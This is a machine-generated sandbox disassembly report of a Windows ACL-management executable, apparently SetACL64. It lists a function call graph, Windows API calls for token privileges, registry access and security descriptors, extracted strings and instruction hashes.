42975->42974 42977 7ff6868799bc 63 API calls 42975->42977 43142 7ff68686e1f8 14 API calls _invalid_parameter_noinfo 42975->43142 42977->42975 42978->42954 42979->42947 42980->42963 42982 7ff686879a06 42981->42982 42991 7ff6868799ed 42981->42991 43008 7ff686879b38 42982->43008 42986 7ff6868799f7 42988 7ff686862180 _handle_errorf 8 API calls 42986->42988 42987 7ff686879a45 42987->42991 42993 7ff686879b38 31 API calls 42987->42993 42990 7ff686879b25 42988->42990 42989 7ff686879b38 31 API calls 42992 7ff686879a29 42989->42992 42990->42963 42991->42986 43036 7ff68687c394 62 API calls _Wcrtomb 42991->43036 42992->42987 42995 7ff686879b38 31 API calls 42992->42995 42994 7ff686879a6e 42993->42994 42996 7ff686879a97 42994->42996 42998 7ff686879b38 31 API calls 42994->42998 42997 7ff686879a36 42995->42997 42996->42991 42999 7ff686879aad 42996->42999 43000 7ff686879b38 31 API calls 42997->43000 43001 7ff686879a7b 42998->43001 43014 7ff686878da4 42999->43014 43000->42987 43001->42996 43003 7ff686879b38 31 API calls 43001->43003 43004 7ff686879a88 43003->43004 43006 7ff686879b38 31 API calls 43004->43006 43005 7ff686879ac4 43005->42986 43017 7ff6868720f8 43005->43017 43006->42996 43009 7ff686879a0e 43008->43009 43010 7ff686879b41 43008->43010 43009->42987 43009->42989 43037 7ff68686e1f8 14 API calls _invalid_parameter_noinfo 43010->43037 43012 7ff686879b46 43038 7ff6868688dc 31 API calls _invalid_parameter_noinfo 43012->43038 43039 7ff686878c08 43014->43039 43018 7ff68687c2a8 43017->43018 43019 7ff686872102 43017->43019 43020 7ff686879b38 31 API calls 43018->43020 43019->43005 43021 7ff68687c2c4 43020->43021 43022 7ff68687c2e8 43021->43022 43023 7ff68687c2d0 43021->43023 43025 7ff68687c2f2 43022->43025 43026 7ff68687c2ff 43022->43026 43117 7ff68686e1f8 14 API calls _invalid_parameter_noinfo 43023->43117 43118 7ff68686e1f8 14 API calls _invalid_parameter_noinfo 43025->43118 43032 7ff68687c30e 43026->43032 43119 7ff68687c22c 33 API calls 43026->43119 43028 7ff68687c36b 43128 7ff68687c060 59 API calls 43028->43128 43029 7ff68687c2d5 43029->43005 43032->43028 43032->43029 43034 7ff68687c35f 43032->43034 43120 7ff6868801a0 43032->43120 43034->43028 43112 7ff686880648 43034->43112 43036->42986 43037->43012 43038->43009 43040 7ff686878c2b 43039->43040 43041 7ff686878c65 43040->43041 43042 7ff686878c4f 43040->43042 43052 7ff686878c30 43040->43052 43066 7ff68686aff8 43041->43066 43064 7ff68686e1f8 14 API calls _invalid_parameter_noinfo 43042->43064 43046 7ff686878c54 43065 7ff6868688dc 31 API calls _invalid_parameter_noinfo 43046->43065 43047 7ff686878c81 43074 7ff68687edcc 14 API calls _Wcrtomb 43047->43074 43048 7ff686878caf 43051 7ff686878cb9 43048->43051 43077 7ff68687c480 WideCharToMultiByte 43048->43077 43054 7ff686878d0d memcpy_s 43051->43054 43058 7ff686878cc7 memcpy_s 43051->43058 43052->43005 43053 7ff686878c96 43053->43052 43075 7ff68686e1f8 14 API calls _invalid_parameter_noinfo 43053->43075 43054->43052 43078 7ff68686e1f8 14 API calls _invalid_parameter_noinfo 43054->43078 43058->43052 43076 7ff68686e1f8 14 API calls _invalid_parameter_noinfo 43058->43076 43062 7ff686878d93 43079 7ff6868688dc 31 API calls _invalid_parameter_noinfo 43062->43079 43064->43046 43065->43052 43067 7ff68686b017 43066->43067 43068 7ff68686b01c 43066->43068 43067->43047 43067->43048 43068->43067 43080 7ff686873e64 GetLastError 43068->43080 43070 7ff68686b037 43104 7ff686878db8 16 API calls _Toupper 43070->43104 43072 7ff68686b05a 43105 7ff686878dec 16 API calls _Tolower 43072->43105 43074->43053 43075->43052 43076->43052 43078->43062 43079->43052 43081 7ff686873e86 43080->43081 43082 7ff686873e8b 43080->43082 43106 7ff686877e14 6 API calls try_get_function 43081->43106 43086 7ff686873e93 SetLastError 43082->43086 43107 7ff686877e5c 6 API calls try_get_function 43082->43107 43085 7ff686873eae 43085->43086 43088 7ff686874fdc _Toupper 14 API calls 43085->43088 43089 7ff686873f22 43086->43089 43090 7ff686873ec1 43088->43090 43089->43070 43091 7ff686873edf 43090->43091 43092 7ff686873ecf 43090->43092 43109 7ff686877e5c 6 API calls try_get_function 43091->43109 43108 7ff686877e5c 6 API calls try_get_function 43092->43108 43095 7ff686873ed6 43099 7ff686875054 Concurrency::details::SchedulerProxy::DeleteThis 14 API calls 43095->43099 43096 7ff686873ee7 43097 7ff686873efd 43096->43097 43098 7ff686873eeb 43096->43098 43111 7ff686873c14 14 API calls _Toupper 43097->43111 43110 7ff686877e5c 6 API calls try_get_function 43098->43110 43099->43086 43102 7ff686873f05 43103 7ff686875054 Concurrency::details::SchedulerProxy::DeleteThis 14 API calls 43102->43103 43103->43086 43104->43072 43105->43067 43107->43085 43108->43095 43109->43096 43110->43095 43111->43102 43129 7ff686875094 43112->43129 43115 7ff686875054 Concurrency::details::SchedulerProxy::DeleteThis 14 API calls 43116 7ff686880672 43115->43116 43116->43028 43117->43029 43118->43029 43119->43032 43121 7ff6868801a9 43120->43121 43123 7ff6868801b6 43120->43123 43138 7ff68686e1f8 14 API calls _invalid_parameter_noinfo 43121->43138 43124 7ff6868801ae 43123->43124 43139 7ff68686e1f8 14 API calls _invalid_parameter_noinfo 43123->43139 43124->43034 43126 7ff6868801ed 43140 7ff6868688dc 31 API calls _invalid_parameter_noinfo 43126->43140 43128->43029 43130 7ff6868750df 43129->43130 43134 7ff6868750a3 _Toupper 43129->43134 43137 7ff68686e1f8 14 API calls _invalid_parameter_noinfo 43130->43137 43132 7ff6868750c6 HeapAlloc 43133 7ff6868750dd 43132->43133 43132->43134 43133->43115 43134->43130 43134->43132 43136 7ff6868724d0 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 43134->43136 43136->43134 43137->43133 43138->43124 43139->43126 43140->43124 43141->42975 43142->42975 43143 7ff6868622fc 43166 7ff6868624c8 43143->43166 43146 7ff68686231d __scrt_acquire_startup_lock 43149 7ff68686245d 43146->43149 43151 7ff68686233b 43146->43151 43147 7ff686862453 43189 7ff686862e8c 7 API calls 2 library calls 43147->43189 43190 7ff686862e8c 7 API calls 2 library calls 43149->43190 43152 7ff686862360 43151->43152 43157 7ff68686237d __scrt_release_startup_lock 43151->43157 43174 7ff686872e48 43151->43174 43153 7ff686862468 43155 7ff6868623e6 43179 7ff686872df0 43155->43179 43157->43155 43188 7ff68687318c 16 API calls __GSHandlerCheck_EH 43157->43188 43159 7ff6868623eb 43185 7ff686821590 43159->43185 43191 7ff686863118 43166->43191 43169 7ff6868624f7 43193 7ff6868738c0 43169->43193 43172 7ff686862315 43172->43146 43172->43147 43175 7ff686872e7d 43174->43175 43176 7ff686872e97 43174->43176 43175->43176 43210 7ff686821130 43175->43210 43217 7ff6868213f0 CreateMutexExW CreateEventW CreateEventW 43175->43217 43176->43157 43180 7ff686872e15 43179->43180 43181 7ff686872e00 43179->43181 43180->43159 43181->43180 43226 7ff686872ad0 34 API calls Concurrency::details::SchedulerProxy::DeleteThis 43181->43226 43183 7ff686872e1e 43183->43180 43227 7ff686872c90 15 API calls 3 library calls 43183->43227 43228 7ff6868699a4 43185->43228 43187 7ff6868215c4 43188->43155 43189->43149 43190->43153 43192 7ff6868624ea __scrt_dllmain_crt_thread_attach 43191->43192 43192->43169 43192->43172 43194 7ff68687d76c 43193->43194 43195 7ff6868624fc 43194->43195 43198 7ff686878a04 43194->43198 43195->43172 43197 7ff686865020 7 API calls 2 library calls 43195->43197 43197->43172 43209 7ff68686f264 EnterCriticalSection 43198->43209 43200 7ff686878a14 43201 7ff68687d280 32 API calls 43200->43201 43202 7ff686878a1d 43201->43202 43203 7ff686878a2b 43202->43203 43204 7ff686878808 34 API calls 43202->43204 43205 7ff68686f2b8 std::_Locinfo::_Locinfo_ctor LeaveCriticalSection 43203->43205 43206 7ff686878a26 43204->43206 43207 7ff686878a37 43205->43207 43208 7ff6868788f8 GetStdHandle GetFileType 43206->43208 43207->43194 43208->43203 43218 7ff6868626c4 43210->43218 43213 7ff686821169 WSAStartup 43214 7ff68682117d 43213->43214 43215 7ff686862180 _handle_errorf 8 API calls 43214->43215 43216 7ff68682118d 43215->43216 43216->43175 43221 7ff686862688 43218->43221 43220 7ff686821155 43220->43213 43220->43214 43222 7ff6868626a2 43221->43222 43224 7ff68686269b 43221->43224 43225 7ff68687374c 34 API calls 43222->43225 43224->43220 43225->43224 43226->43183 43227->43180 43229 7ff6868699d8 43228->43229 43230 7ff6868699c4 43228->43230 43232 7ff686873e64 _Toupper 16 API calls 43229->43232 43263 7ff68686e1f8 14 API calls _invalid_parameter_noinfo 43230->43263 43234 7ff6868699dd 43232->43234 43233 7ff6868699c9 43264 7ff6868688dc 31 API calls _invalid_parameter_noinfo 43233->43264 43242 7ff686878294 43234->43242 43237 7ff6868699d4 43237->43187 43238 7ff6868699e6 43239 7ff686875954 _Toupper 16 API calls 43238->43239 43240 7ff6868699eb 43239->43240 43241 7ff686868f90 std::_Locinfo::_Locinfo_ctor 62 API calls 43240->43241 43241->43237 43265 7ff686877998 43242->43265 43245 7ff686877998 try_get_function 5 API calls 43246 7ff6868782d3 43245->43246 43247 7ff686877998 try_get_function 5 API calls 43246->43247 43248 7ff6868782f2 43247->43248 43249 7ff686877998 try_get_function 5 API calls 43248->43249 43250 7ff686878311 43249->43250 43251 7ff686877998 try_get_function 5 API calls 43250->43251 43252 7ff686878330 43251->43252 43253 7ff686877998 try_get_function 5 API calls 43252->43253 43254 7ff68687834f 43253->43254 43255 7ff686877998 try_get_function 5 API calls 43254->43255 43256 7ff68687836e 43255->43256 43257 7ff686877998 try_get_function 5 API calls 43256->43257 43258 7ff68687838d 43257->43258 43259 7ff686877998 try_get_function 5 API calls 43258->43259 43260 7ff6868783ac 43259->43260 43261 7ff686877998 try_get_function 5 API calls 43260->43261 43262 7ff6868783cb 43261->43262 43263->43233 43264->43237 43266 7ff6868779f9 43265->43266 43273 7ff6868779f4 try_get_function 43265->43273 43266->43245 43267 7ff686877adc 43267->43266 43270 7ff686877aea GetProcAddress 43267->43270 43268 7ff686877a28 LoadLibraryExW 43269 7ff686877a49 GetLastError 43268->43269 43268->43273 43269->43273 43271 7ff686877afb 43270->43271 43271->43266 43272 7ff686877ac1 FreeLibrary 43272->43273 43273->43266 43273->43267 43273->43268 43273->43272 43274 7ff686877a83 LoadLibraryExW 43273->43274 43274->43273 43275 7ff686843d1b AdjustTokenPrivileges 43276 7ff686843d66 GetLastError CloseHandle 43275->43276 43277 7ff686843d4d GetLastError 43275->43277 43279 7ff686843d7a ISource 43276->43279 43277->43276 43278 7ff686843d57 CloseHandle 43277->43278 43278->43279 43280 7ff68684440c 43279->43280 43281 7ff686833f80 35 API calls 43279->43281 43284 7ff686844412 43279->43284 43295 7ff686843e78 ISource 43279->43295 43283 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43280->43283 43285 7ff686843e48 43281->43285 43282 7ff686833f80 35 API calls 43286 7ff686843f4a 43282->43286 43283->43284 43287 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43284->43287 43288 7ff686833f80 35 API calls 43285->43288 43289 7ff686833f80 35 API calls 43286->43289 43290 7ff686844418 43287->43290 43288->43295 43291 7ff686843f77 GetCurrentProcess OpenProcessToken 43289->43291 43293 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43290->43293 43292 7ff686843f9a GetLastError 43291->43292 43297 7ff686844037 ISource 43292->43297 43294 7ff68684441e 43293->43294 43296 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43294->43296 43295->43282 43295->43290 43300 7ff6868443dd 43295->43300 43298 7ff686844424 43296->43298 43297->43294 43297->43298 43299 7ff686833f80 35 API calls 43297->43299 43307 7ff6868441d3 ISource 43297->43307 43302 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43298->43302 43301 7ff686844105 43299->43301 43304 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43300->43304 43305 7ff686833f80 35 API calls 43301->43305 43306 7ff68684442a 43302->43306 43303 7ff686844314 43308 7ff686844331 43303->43308 43311 7ff68685e4b0 92 API calls 43303->43311 43309 7ff6868443e2 43304->43309 43321 7ff686844135 ISource 43305->43321 43313 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43306->43313 43310 7ff68685e4b0 92 API calls 43307->43310 43315 7ff686844268 43307->43315 43322 7ff686844356 43307->43322 43314 7ff68685e4b0 92 API calls 43308->43314 43319 7ff686844352 43308->43319 43308->43322 43312 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43309->43312 43310->43307 43311->43308 43316 7ff6868443e8 43312->43316 43317 7ff686844430 43313->43317 43314->43319 43315->43303 43318 7ff68685e4b0 92 API calls 43315->43318 43315->43322 43320 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43316->43320 43318->43315 43319->43322 43325 7ff68684a350 254 API calls 43319->43325 43324 7ff6868443ee 43320->43324 43321->43300 43321->43306 43321->43307 43323 7ff686862180 _handle_errorf 8 API calls 43322->43323 43326 7ff6868443c0 43323->43326 43327 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43324->43327 43325->43322 43328 7ff6868443f4 43327->43328 43329 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43328->43329 43330 7ff6868443fa 43329->43330 43331 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43330->43331 43332 7ff686844400 43331->43332 43333 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43332->43333 43334 7ff686844406 43333->43334 43335 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43334->43335 43335->43280 43336 7ff68683c780 43337 7ff68683c7a6 43336->43337 43340 7ff68686d5bc 43337->43340 43341 7ff68686d5f7 43340->43341 43342 7ff68686d5e2 43340->43342 43341->43342 43344 7ff68686d5fc 43341->43344 43356 7ff68686e1f8 14 API calls _invalid_parameter_noinfo 43342->43356 43349 7ff68686a8ac 43344->43349 43345 7ff68686d5e7 43357 7ff6868688dc 31 API calls _invalid_parameter_noinfo 43345->43357 43348 7ff68683c7bc 43358 7ff68686a894 EnterCriticalSection 43349->43358 43351 7ff68686a8c9 43352 7ff68686b1dc 63 API calls 43351->43352 43353 7ff68686a8d2 43352->43353 43354 7ff68686a8a0 LeaveCriticalSection 43353->43354 43355 7ff68686a8dc 43354->43355 43355->43348 43356->43345 43357->43348 43359 7ff686843a5e AdjustTokenPrivileges 43360 7ff686843aa9 GetLastError CloseHandle 43359->43360 43361 7ff686843a90 GetLastError 43359->43361 43363 7ff686843abd ISource 43360->43363 43361->43360 43362 7ff686843a9a CloseHandle 43361->43362 43362->43363 43364 7ff6868443fa 43363->43364 43365 7ff686844400 43363->43365 43366 7ff686833f80 35 API calls 43363->43366 43379 7ff686843bbb ISource 43363->43379 43368 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43364->43368 43371 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43365->43371 43369 7ff686843b8b 43366->43369 43367 7ff686833f80 35 API calls 43370 7ff686843c8d 43367->43370 43368->43365 43373 7ff686833f80 35 API calls 43369->43373 43374 7ff686833f80 35 API calls 43370->43374 43372 7ff686844406 43371->43372 43376 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43372->43376 43373->43379 43375 7ff686843cba GetCurrentProcess OpenProcessToken 43374->43375 43377 7ff686843cdd GetLastError 43375->43377 43378 7ff68684440c 43376->43378 43381 7ff686843d7a ISource 43377->43381 43380 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43378->43380 43379->43367 43379->43372 43385 7ff6868443dd 43379->43385 43382 7ff686844412 43380->43382 43381->43378 43381->43382 43383 7ff686833f80 35 API calls 43381->43383 43400 7ff686843e78 ISource 43381->43400 43388 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43382->43388 43386 7ff686843e48 43383->43386 43384 7ff686833f80 35 API calls 43387 7ff686843f4a 43384->43387 43389 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43385->43389 43390 7ff686833f80 35 API calls 43386->43390 43391 7ff686833f80 35 API calls 43387->43391 43392 7ff686844418 43388->43392 43393 7ff6868443e2 43389->43393 43390->43400 43394 7ff686843f77 GetCurrentProcess OpenProcessToken 43391->43394 43397 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43392->43397 43395 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43393->43395 43396 7ff686843f9a GetLastError 43394->43396 43398 7ff6868443e8 43395->43398 43404 7ff686844037 ISource 43396->43404 43399 7ff68684441e 43397->43399 43401 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43398->43401 43402 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43399->43402 43400->43384 43400->43385 43400->43392 43403 7ff6868443ee 43401->43403 43405 7ff686844424 43402->43405 43409 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43403->43409 43404->43399 43404->43405 43406 7ff686833f80 35 API calls 43404->43406 43413 7ff6868441d3 ISource 43404->43413 43408 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43405->43408 43407 7ff686844105 43406->43407 43411 7ff686833f80 35 API calls 43407->43411 43412 7ff68684442a 43408->43412 43415 7ff6868443f4 43409->43415 43410 7ff686844314 43414 7ff686844331 43410->43414 43417 7ff68685e4b0 92 API calls 43410->43417 43425 7ff686844135 ISource 43411->43425 43418 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43412->43418 43416 7ff68685e4b0 92 API calls 43413->43416 43421 7ff686844268 43413->43421 43426 7ff686844356 43413->43426 43419 7ff68685e4b0 92 API calls 43414->43419 43424 7ff686844352 43414->43424 43414->43426 43420 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43415->43420 43416->43413 43417->43414 43422 7ff686844430 43418->43422 43419->43424 43420->43364 43421->43410 43423 7ff68685e4b0 92 API calls 43421->43423 43421->43426 43423->43421 43424->43426 43428 7ff68684a350 254 API calls 43424->43428 43425->43385 43425->43412 43425->43413 43427 7ff686862180 _handle_errorf 8 API calls 43426->43427 43429 7ff6868443c0 43427->43429 43428->43426 43430 7ff68686e500 43431 7ff68686e51d 43430->43431 43432 7ff68686e50e GetLastError ExitThread 43430->43432 43433 7ff686873e64 _Toupper 16 API calls 43431->43433 43434 7ff68686e522 43433->43434 43443 7ff68687a9d0 43434->43443 43437 7ff68686e53b 43447 7ff68683e8c0 43437->43447 43439 7ff68686e550 43461 7ff68686e700 43439->43461 43444 7ff68686e52e 43443->43444 43445 7ff68687a9e0 43443->43445 43444->43437 43460 7ff6868781f0 5 API calls try_get_function 43444->43460 43445->43444 43464 7ff686877bc0 43445->43464 43448 7ff68683e8d7 ISource 43447->43448 43449 7ff68683e9ee ISource 43448->43449 43450 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43448->43450 43449->43439 43451 7ff68683ea15 43450->43451 43452 7ff68683ea29 43451->43452 43453 7ff68683ea3c 43451->43453 43467 7ff68683d760 WaitForSingleObject 43452->43467 43495 7ff686864c18 RtlPcToFileHeader RaiseException 43453->43495 43456 7ff68683ea59 43458 7ff68686e700 17 API calls 43459 7ff68683ea35 43458->43459 43459->43439 43460->43437 43497 7ff68686e568 43461->43497 43465 7ff686877998 try_get_function 5 API calls 43464->43465 43466 7ff686877be8 43465->43466 43466->43444 43468 7ff68683d8a6 ReleaseMutex 43467->43468 43475 7ff68683d8d4 ISource 43467->43475 43469 7ff68683da41 ResetEvent 43468->43469 43468->43475 43470 7ff68683da48 WaitForSingleObject 43469->43470 43471 7ff68683da5f ReleaseMutex 43470->43471 43470->43475 43483 7ff68683dab8 ISource 43471->43483 43472 7ff68683e853 43473 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43472->43473 43476 7ff68683e859 43473->43476 43474 7ff68683da02 ISource 43477 7ff686862180 _handle_errorf 8 API calls 43474->43477 43475->43472 43475->43474 43481 7ff68683e84e 43475->43481 43489 7ff68683e865 43475->43489 43484 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43476->43484 43478 7ff68683da16 43477->43478 43478->43458 43480 7ff6868688fc 31 API calls _invalid_parameter_noinfo_noreturn 43480->43489 43482 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43481->43482 43482->43472 43483->43475 43486 7ff68683dac1 EnterCriticalSection 43483->43486 43485 7ff68683e85f 43484->43485 43487 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43485->43487 43490 7ff68683db20 CloseHandle 43486->43490 43487->43489 43488 7ff68683e88e 43489->43480 43489->43488 43496 7ff686833e30 33 API calls 43489->43496 43493 7ff68683e826 43490->43493 43494 7ff68683e8c0 36 API calls 43493->43494 43494->43481 43495->43456 43506 7ff686873fe0 GetLastError 43497->43506 43499 7ff68686e579 43500 7ff68686e5c0 ExitThread 43499->43500 43501 7ff68686e595 43499->43501 43529 7ff686878230 5 API calls try_get_function 43499->43529 43503 7ff68686e5a9 43501->43503 43504 7ff68686e5a3 CloseHandle 43501->43504 43503->43500 43505 7ff68686e5b7 FreeLibraryAndExitThread 43503->43505 43504->43503 43505->43500 43507 7ff686874002 43506->43507 43508 7ff686874007 43506->43508 43530 7ff686877e14 6 API calls try_get_function 43507->43530 43513 7ff68687400f SetLastError 43508->43513 43531 7ff686877e5c 6 API calls try_get_function 43508->43531 43511 7ff68687402a 43512 7ff686874fdc _Toupper 12 API calls 43511->43512 43511->43513 43515 7ff68687403d 43512->43515 43513->43499 43516 7ff68687405b 43515->43516 43517 7ff68687404b 43515->43517 43533 7ff686877e5c 6 API calls try_get_function 43516->43533 43532 7ff686877e5c 6 API calls try_get_function 43517->43532 43520 7ff686874052 43524 7ff686875054 Concurrency::details::SchedulerProxy::DeleteThis 12 API calls 43520->43524 43521 7ff686874063 43522 7ff686874079 43521->43522 43523 7ff686874067 43521->43523 43535 7ff686873c14 14 API calls _Toupper 43522->43535 43534 7ff686877e5c 6 API calls try_get_function 43523->43534 43524->43513 43527 7ff686874081 43528 7ff686875054 Concurrency::details::SchedulerProxy::DeleteThis 12 API calls 43527->43528 43528->43513 43529->43501 43531->43511 43532->43520 43533->43521 43534->43520 43535->43527 43536 7ff68683d304 43537 7ff68683d310 43536->43537 43538 7ff68683d65f LeaveCriticalSection 43536->43538 43537->43538 43539 7ff68683d326 43537->43539 43540 7ff68683d659 43538->43540 43541 7ff68683d35b 43539->43541 43542 7ff68683d330 GetSystemTimeAsFileTime 43539->43542 43543 7ff68683d6a0 ISource 43540->43543 43549 7ff68683d74d 43540->43549 43544 7ff68683d36f 43541->43544 43545 7ff68683d35f GetCurrentThreadId 43541->43545 43542->43541 43546 7ff68683d6d9 ISource 43543->43546 43551 7ff68683d753 43543->43551 43547 7ff68683d527 LeaveCriticalSection 43544->43547 43548 7ff68683d377 GetUserNameExW 43544->43548 43545->43544 43552 7ff686862180 _handle_errorf 8 API calls 43546->43552 43550 7ff6868621d4 std::_Facet_Register 5 API calls 43547->43550 43553 7ff68683d3b9 43548->43553 43554 7ff68683d3a6 GetLastError 43548->43554 43555 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43549->43555 43556 7ff68683d53a 43550->43556 43557 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43551->43557 43558 7ff68683d727 43552->43558 43586 7ff686835790 35 API calls 3 library calls 43553->43586 43554->43553 43570 7ff68683d452 ISource 43554->43570 43555->43551 43560 7ff68683d5cc 43556->43560 43567 7ff686833f80 35 API calls 43556->43567 43561 7ff68683d759 43557->43561 43563 7ff68683d605 43560->43563 43568 7ff686833f80 35 API calls 43560->43568 43562 7ff68683d3c9 GetUserNameExW 43564 7ff68683d3e6 GetLastError 43562->43564 43565 7ff68683d3f0 43562->43565 43569 7ff68683d627 43563->43569 43571 7ff686833f80 35 API calls 43563->43571 43566 7ff68683d417 43564->43566 43574 7ff686833f80 35 API calls 43565->43574 43566->43570 43578 7ff68683d748 43566->43578 43567->43560 43568->43563 43572 7ff68683d649 43569->43572 43577 7ff686833f80 35 API calls 43569->43577 43570->43547 43587 7ff68682a740 36 API calls 3 library calls 43570->43587 43571->43569 43589 7ff68683ea60 9 API calls std::_Facet_Register 43572->43589 43574->43566 43576 7ff68683d51b 43588 7ff686829720 31 API calls 2 library calls 43576->43588 43577->43572 43580 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43578->43580 43579 7ff68683d4ee 43579->43576 43585 7ff686833f80 35 API calls 43579->43585 43580->43549 43582 7ff68683d4b5 43582->43576 43582->43579 43584 7ff686833f80 35 API calls 43582->43584 43583 7ff68683d526 43583->43547 43584->43579 43585->43576 43586->43562 43587->43582 43588->43583 43589->43540
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$ErrorLast$Information$Delete$Valid$FreeLocal$CopyLength
                                        • String ID: > because a filter keyword matched.$> failed with: $Omitting ACL of: <$Processing ACL of: <$Reading the SD from <$SetEntriesInAcl for DACL of <$SetEntriesInAcl for SACL of <$Write2SD$Writing SD to <
                                        • API String ID: 3366768055-1688761767
                                        • Opcode ID: 8c702df0ce635fb3871e4a0553cb4715271af5242ae0ef260948fefd7f14e07d
                                        • Instruction ID: 6d925ab288e5e114c3f70b8b71343917f812444a879e869c0a8dac5510dd36b1
                                        • Opcode Fuzzy Hash: 8c702df0ce635fb3871e4a0553cb4715271af5242ae0ef260948fefd7f14e07d
                                        • Instruction Fuzzy Hash: 5F33C1B2A18782C5EB208F25D8483FD23A5FF44798F405139DA5D87AE9DF79E984C720
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$Close$EnumLockitSimpleString::operator=std::_$ConnectCreateLockit::_Lockit::~_OpenRegistrySetgloballocalestd::locale::_
                                        • String ID: RegKeyFixPathAndOpen$Unintentionally the following registry key was created: <$classes_root$current_user$hkcr$hkcu$hkey_classes_root$hkey_current_user$hkey_local_machine$hkey_users$hklm$hku$machine$users
                                        • API String ID: 2754268630-3593729730
                                        • Opcode ID: 706d74c401a7eba7e1d9deaebb3a5822d64d4f896357cd9c5b521f9506353fbc
                                        • Instruction ID: f41443ad83dc2b942af6477adcf1c35fbf48749d131eb586d42823c96d2cc871
                                        • Opcode Fuzzy Hash: 706d74c401a7eba7e1d9deaebb3a5822d64d4f896357cd9c5b521f9506353fbc
                                        • Instruction Fuzzy Hash: C2F2B0A2B09B52C5EB20DB65D4402BD33A5FF84B88F444139DA4D977A9EFBED844C360
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$ErrorLastSecurity$Valid$AbsoluteCloseKernelMakeObject$CreateDescriptorFileFreeHandleInfoLocalNamed
                                        • String ID: SeSecurityPrivilege
                                        • API String ID: 3247214862-2333288578
                                        • Opcode ID: 054ea4d1a2d6c0b3adbe8e4b57b4ca5633b3a582fabd17bd529d99db77766a5b
                                        • Instruction ID: edb9810a3074a850746ac64d15d38870c9d3946d00b1f313f91ea40711b06da2
